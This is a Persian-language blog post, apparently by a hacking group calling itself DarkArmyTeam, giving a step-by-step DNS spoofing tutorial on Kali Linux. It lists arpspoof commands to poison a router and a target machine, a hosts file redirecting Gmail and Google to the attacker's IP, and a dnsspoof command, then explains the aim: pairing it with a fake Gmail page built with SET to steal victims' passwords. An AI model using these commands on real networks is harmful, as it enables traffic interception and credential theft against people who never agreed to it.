سلام به ستونای گنگ و بتونای سنگ مجازی :)

اومدم با به پست خفن که به امید خدا استارت شروع دوباره تیم باشه...

این پست بعد کامنت یکی از دوستان که دنبال مطالب لینوکسی میگشت به ذهنم رسید و گفتم بگم که شما هم استفاده کنید.

میدونم برای شما که توی این کارید خیلی مسخره‌س ولی اول باید ببینیم dns چی هست؟

وقتی ما آدرس یک سایتو توی مرورگر وارد میکنیم در اصل داریم از سرورای dns که از قبل تعریف شده آی پی سایت رو گیر میاریم.

در اصل ما با آی پی به سایت دسترسی پیدا میکنیم.


بعد باید ببینیم حملات dns spoof یا آلوده سازی دی ان اس چیه؟

در مرحله اول هنگام جستجو، دستگاهی که باهاش سرچ میکنید، دی ان اس محلی(local) رو برای آی پی سایت سرچ میکنه و اگه نبود از دی ان اس های جهانی کمک میگیره. حالا ما با این حملات آدرس سایت رو با آدرس آی پی مد نظرمون توی دی ان اس محلی ذخیره میکنیم.

یعنی آی پی خودمون رو با آی پی اصلی سایت عوض میکنیم :)


حالا کالی رو آتیش کنید و ترمینال رو باز کنید.

دستور ifconfig رو اجرا کنید و آیپی خودتون رو کپی کنید.

حالا دستورات زیر رو توی ترمینال خط به خط اجرا کنید (باید توی دو تا ترمینال متفاوت اجرا کنید. چون کد ها تا وقتی تمومش نکنید اجرا میشن)

192.168.1.1 = ایپی روتر

192.168.1.100 = ایپی هدف

arpspoof -i eth0 -t 192.168.1.1 192.168.1.100
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

حالا یه فایل جدید متنی بسازید و اسمشو بزارید hosts.txt و کد های زیر رو کپی کنید توش:

192.168.1.101 = ایپی خودتون
www.gmail.com 192.168.1.101
www.google.com 192.168.1.101
حالا دستور زیر رو توی یه ترمینال جدید بنویسید:
dnsspoof -i eth0 -f hosts.txt


تموم!

اگه توی سیستم هدف از سایت جیمیل یا گوگل پینگ بگیرید بجای آیپی اصلی گوگل آیپی 192.168.1.101 رو میبینید :)



حالا شاید بگید به چه درد میخوره؟
از این حمله برای فیشینگ استفاده میشه.
مثلا میتونید با ابزار SET یه صفحه جعلی جیمیل درست کنید.
وقتی هدف آدرس جیمیل رو میزنه بجای ورود با جیمیل به صفحه فیشینگ ما وارد میشه و با زدن رمزش ما میتونیم اطلاعاتو کش بریم :)





we work in dark to serve light
we are DarkArmyTeam